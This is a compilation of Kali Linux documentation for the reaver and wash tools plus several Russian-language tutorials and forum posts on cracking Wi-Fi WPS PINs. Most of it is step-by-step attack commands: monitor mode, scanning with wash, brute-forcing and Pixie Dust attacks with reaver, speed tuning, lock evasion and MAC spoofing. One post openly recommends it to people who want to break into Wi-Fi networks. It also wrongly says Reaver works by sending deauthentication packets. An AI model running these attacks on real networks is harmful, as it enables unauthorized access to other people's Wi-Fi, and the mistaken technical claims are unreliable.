Tool Documentation:
Scan for networks using the monitor mode interface ( -i wlan0mon ) on channel 6 ( -c 6 ), while ignoring frame checksum errors ( -C ):
root@kali:~# wash -i wlan0mon -c 6 -C BSSID Ch dBm WPS Lck Vendor ESSID -------------------------------------------------------------------------------- E0:3F:49:6A:57:78 6 -73 1.0 No Unknown ASUS
reaver Usage Example
Use the monitor mode interface ( -i mon0 ) to attack the access point ( -b E0:3F:49:6A:57:78 ), displaying verbose output ( -v ):
root@kali:~# reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [email protected]> [+] Waiting for beacon from E0:3F:49:6A:57:78 [+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS) [+] Trying pin 12345670
Packages and Binaries:
reaver
Reaver performs a brute force attack against an access point’s WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP’s wireless settings can be reconfigured.
Installed size: 846 KB
How to install: sudo apt install reaver
- libc6
- libpcap0.8
reaver
root@kali:~# reaver -h Reaver v1.6.6 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [email protected]> Required Arguments: -i, --interface= Name of the monitor-mode interface to use -b, --bssid= BSSID of the target AP Optional Arguments: -m, --mac= MAC of the host system -e, --essid= ESSID of the target AP -c, --channel= Set the 802.11 channel for the interface (implies -f) -s, --session= Restore a previous session file -C, --exec= Execute the supplied command upon successful pin recovery -f, --fixed Disable channel hopping -5, --5ghz Use 5GHz 802.11 channels -v, --verbose Display non-critical warnings (-vv or -vvv for more) -q, --quiet Only display critical messages -h, --help Show help Advanced Options: -p, --pin= Use the specified pin (may be arbitrary string or 4/8 digit WPS pin) -d, --delay= Set the delay between pin attempts [1] -l, --lock-delay= Set the time to wait if the AP locks WPS pin attempts [60] -g, --max-attempts= Quit after num pin attempts -x, --fail-wait= Set the time to sleep after 10 unexpected failures [0] -r, --recurring-delay= Sleep for y seconds every x pin attempts -t, --timeout= Set the receive timeout period [10] -T, --m57-timeout= Set the M5/M7 timeout period [0.40] -A, --no-associate Do not associate with the AP (association must be done by another application) -N, --no-nacks Do not send NACK messages when out of order packets are received -S, --dh-small Use small DH keys to improve crack speed -L, --ignore-locks Ignore locked state reported by the target AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet -J, --timeout-is-nack Treat timeout as NACK (DIR-300/320) -F, --ignore-fcs Ignore frame checksum errors -w, --win7 Mimic a Windows 7 registrar [False] -K, --pixie-dust Run pixiedust attack -Z Run pixiedust attack -O, --output-file= Write packets of interest into pcap file Example: reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
wash
root@kali:~# wash -h Wash v1.6.6 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner Required Arguments: -i, --interface= Interface to capture packets on -f, --file [FILE1 FILE2 FILE3 . ] Read packets from capture files Optional Arguments: -c, --channel= Channel to listen on [auto] -n, --probes= Maximum number of probes to send to each AP in scan mode [15] -O, --output-file= Write packets of interest into pcap file -F, --ignore-fcs Ignore frame checksum errors -2, --2ghz Use 2.4GHz 802.11 channels -5, --5ghz Use 5GHz 802.11 channels -s, --scan Use scan mode -u, --survey Use survey mode [default] -a, --all Show all APs, even those without WPS -j, --json print extended WPS info as json -U, --utf8 Show UTF8 ESSID (does not sanitize ESSID, dangerous) -p, --progress Show percentage of crack progress -h, --help Show help Example: wash -i wlan0mon
Updated on: 2023-Aug-10
Взлом WPS Wi-Fi с помощью Reaver на Kali Linux
Reaver — это бесплатный инструмент с открытым исходным кодом, который можно использовать для брута PIN-кодов WPS. Мы уже поверхностно рассказывали про этот способ в статье актуальные техники взлома WiFi. Сегодня подробно рассмотрим взлом WPS Wi-Fi с помощью Reaver.
Что такое WPS
WPS (Wi-Fi Protected Setup) — это удобный способ подключения устройств к Wi-Fi сети, но у него есть уязвимости. Reaver эксплуатирует эти уязвимости. Он перебирает возможные PIN-коды (Personal Identification Number), которые используются для подключения устройств к Wi-Fi через WPS.
Виды атак на WPS
Существует два основных типа атак на WPS:
- Онлайн-атаки позволяют взломать PIN-код путем отправки запросов к точке доступа по сети.
- Оффлайн-атаки, напротив, не требуют доступа к сети и опираются на перехваченные данные рукопожатия.
Reaver работает путем отправки серии пакетов деаутентификации на целевой Wi-Fi маршрутизатор. Эти пакеты деаутентификации заставляют маршрутизатор отключить все подключенные устройства. После отключения всех устройств Reaver пытается подключиться к маршрутизатору, используя PIN-код WPS. Если PIN-код неверен, Reaver попробует ввести следующий PIN-код из списка. Этот процесс продолжается до тех пор, пока не будет найден правильный PIN-код.
Вся информация, методы и инструменты, описанные в данной статье, предназначены для образовательных целей. Использование представленной в статье информации для атак на WiFi-сети частных лиц или организации без их предварительного согласия является незаконным. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши незаконные действия.
Существует также ряд автономных алгоритмов атаки на WPS. Один из наиболее распространенных — Pixie Dust. Pixie Dust работает за счет использования уязвимости в протоколе WPS, которая позволяет получить PIN-код без взаимодействия с точкой доступа. Как правило, атака проходит успешно в течение нескольких минут.
Что такое брутфорс
Брутфорс (брут или атака грубой силы) — это метод перебора всех возможных комбинаций символов до тех пор, пока не будет найдена правильная. Она может использоваться для взлома паролей, PIN-кодов и других средств защиты.
Например, если хакер хочет получить доступ к компьютерной системе, он может попытаться перебрать пароль, вводя все возможные комбинации букв, цифр и символов, пока не найдет правильную. Это может быть очень долгим процессом, но вполне действенным способом взлома Wi-Fi, если у хакера достаточно времени и ресурсов.
Брут PIN-кода WPS — это метод перебор всех возможных комбинаций из 8 цифр до тех пор, пока не будет найдена правильная. Это может быть использовано для получения доступа к сети Wi-Fi с включенной функцией WPS.
- Восстановление PIN-кода WPS
- Автоматизированный брутфорс
- Поддержка атак «пикси-пыль
- Расширенные опции конфигурации
- Мониторинг состояния
Установка Reaver на Linux
Reaver предустановлен в Kali Linux и других дистрибутивах безопасности Linux. Нет необходимости скачивать или устанавливать его отдельно.
Взлом WPS используя Reaver на Kali Linux
Сначала необходимо перевести адаптер в режим монитора. Для этого выполните команду:
Как пользоваться Reaver
Здесь часто поднимается вопрос как взломать WiFi?. Решил выложить мануал по работе в программе Reaver. Очень рекомендую тем кто, хочет взломать Wi-Fi сеть.
В этом мануале собраны рекомендации по использованию программы Reaver.
Как пользоваться Reaver
- Вы должны иметь навыки работы в Linux
- Должна быть беспроводная карта способная к инъекциям (raw injection)
- Беспроводная карта должна быть переведена в режим “монитора” (monitor mode)
Основное использование Reaver
Для начала убедитесь, что ваша wifi-карта переведена в режим “монитора” (monitor mode):
# airmon-ng start wlan0
Для запуска Reaver, необходимо указать BSSID целевой АР и имя интерфейса, который находится в режиме “монитора” (обычно “mon0?, а не “wlan0?, хотя это будет зависеть от типа беспроводной карты/драйверов):
# reaver -i mon0 -b 00:01:02:03:04:05
Для получения более подробной информации используйте -vv:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Канал и SSID (при условии, что SSID не скрыта) атакуемой АР автоматически определяются Reaver’ом. Но их можно явно указать в команде:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
По умолчанию, если АР переключает каналы (switches channels), reaver тоже будет это делать. Тем не менее, эта опция будет отключена, если явно указать канал АР:
# reaver -i mon0 -b 00:01:02:03:04:05 —fixed
Увеличение скорости атаки
Обычно по умолчанию период получения тайм-аута (timeout) равен 5 секундам. Но период тайм-аута (timeout) можно уставить вручную (минимальный срок ожидания = 1 сек.):
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
По умолчанию, перед отсылкой очередного pin’a AP, reaver производит задержку, которая равна 1 секунде. Эту задержку можно отключить, воспользовавшись опцией -d 0. Однако некоторым АР будет все равно, но попробовать все таки стоит:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Другой вариант, который может ускорить атаку, опция –dh-small. Опция “говорит” raever’y использовать не большие секретные/скрытые номера Диффи-Хеллмана в целях снижения вычислительной нагрузки на целевую AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv —dh-small
Некоторые АР, при обнаружении подозрительной активности, будут блокировать WPS на 5 минут или меньше. По умолчанию, когда WPS заблокирована, reaver будет проводить проверку состояния WPS на АР, которая составляет 315 секунд (5 минут и 15 секунд). Следовательно перебор пинов будет приостановлен. Эту проверку можно увеличить/уменьшить на любое не отрицательное число:
# reaver -i mon0 -b 00:01:02:03:04:05 —lock-delay=250
По умолчанию период получения M5 и M7 сообщений от WPS составляет 0.1 сек. Если необходимо, период получения этих сообщений можно указать вручную (максимальный период равен 1 секунде):
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Большинству АР не нужно, но иногда необходимо, посылать EAP FAIL сообщения для закрытия WPS сессии. По умолчанию эта опция выключена, однако ее можно включить след. командой:
# reaver -i mon0 -b 00:01:02:03:04:05 —eap-terminate
Когда WPS получает последовательно 10 “неожиданных” ошибок, то появляются предупреждающие сообщения. Это может быть признаком того, что АР ограничена по скорости перебора pin-кодов или она просто перегружена. Таким образом можно указать reaver’у, чтобы он перешел в сонный режим, если эти ошибки будут появляться:
# reaver -i mon0 -b 00:01:02:03:04:05 —fail-wait=360
MAC SPOOFING
В некоторых случаях нужно или вы просто так хотите использовать поддельный MAC-адрес. Reaver поддерживает MAC spoofing благодаря опции –mac. Но для начала вы должны правильно подделать MAC-адрес.
Изменение MAC-адреса на виртуальном интерфейсе (например mon0), который включен в режим “монитора” (monitor mode) не правильно. Нужно изменить MAC-адрес на физическом интерфейсе! Например:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv —mac=00:BA:AD:BE:EF:69
PIN’ы используемые по умолчанию (Default Pins)
Сообщается, что некоторые модели АР используются настроенными по умолчанию. Т.е. они используют стандартные pin-коды: 12345670, 00005678, 01230000 и и.д. В первую очередь reaver будет “перебирать” их – логично.
Ошибки и предупреждения
Получить ошибки и предупреждения во время взлома, не редкое явление. Обычно ошибки связаны с тайм-аутами (timeouts) или сообщения о том, что WPS вышел из строя. Ошибки можно получать по несколько минут, пока общее количество pin’ов не начнет увеличиваться.
И всё-таки, если количество pin’ов не увеличивается или увеличивается, но очень медленно и с большим количеством ошибок, тогда ответьте на след. вопросы:
- на целевой АР включен/поддерживается WPS?
- переведена ли wifi-карта в режим монитора?
- поставлена ли опция -i перед интерфейсом?
- хороший ли сигнал до AP?
Поддержка драйверов в Reaver
Поддерживаются
Следующие беспроводные драйверы были испытаны или, как сообщается успешно работают с Reaver:
- ath9k
- rtl8187
- carl19170
- ipw2000
- rt2800pci
- rt73usb
Частично поддерживаются
Эти драйверы имели переменных успех:
- ath5k
- iwlagn
- rtl2800usb (используя последние compat-wireless драйвера, для многих пользователей проблема исчезла)
- b43
Не поддерживаются
Эти беспроводные драйвера не поддерживаются Reaver:
- iwl4965
- RT3070L
- Netgear WG111v3
Скачать программу программу Reaver, для взлома Wi-Fi можно по этой ссылке.
- Лучший WiFi-адаптер для Kali Linux (цена-качество)
- Фальшивая точка доступа WiFi на Kali Linux с Airgeddon
Взлом Wi-Fi с Kali Linux. Атака на WPS (reaver)
Одним из самых легких способов обхода защиты в беспроводной сети Wi-Fi является атака на WPS.
Wi-Fi Protected Setup(WPS) – это такой стандарт (технология) для упрощенного подключения к беспроводной сети. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях. WPS автоматически обозначает имя сети и задает шифрование для защиты беспроводной Wi-Fi сети от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.
Для взлома нам понадобиться ОС Kali Linux 2.0 в которой уже установлена утилита под названием Reaver. Данная программа создана для надёжной и практичной атаки на WPS.
1. В первую очередь необходимо убедиться, что наш Wi-Fi адаптер распознает система. Для этого введем команду iwconfig . В моём случае адаптер называется wlan.
2. Далее необходимо перевести наш интерфейс в режим монитора – airmon-ng start wlan0 .
3. При помощи утилиты wash узнаем в каких точках доступа включен WPS – wash -i wlan0mon . В качестве жертвы возьмем точку доступа «NETnet». Также с помощью этой утилиты мы узнаем MAC-адрес ТД (E0:**:**:**:61:27).
4. Используем Reaver для вычисления пароля от этой точки доступа. Введём команду reaver -i wlan0mon -b E0:**:**:**:61:27-K 1 . Данный подтип атаки называется Pixie Dust. Параметры -K 1 отвечают за это. Буквально за 30 секунд утилита выдает пароль от ТД.
В случае, если данный метод не сработал, то воспользуйтесь командой reaver -i wlan0mon -b E0:91:F5:BC:61:27 —dh-small . Только придётся подождать, пока система будет вычислять пароль.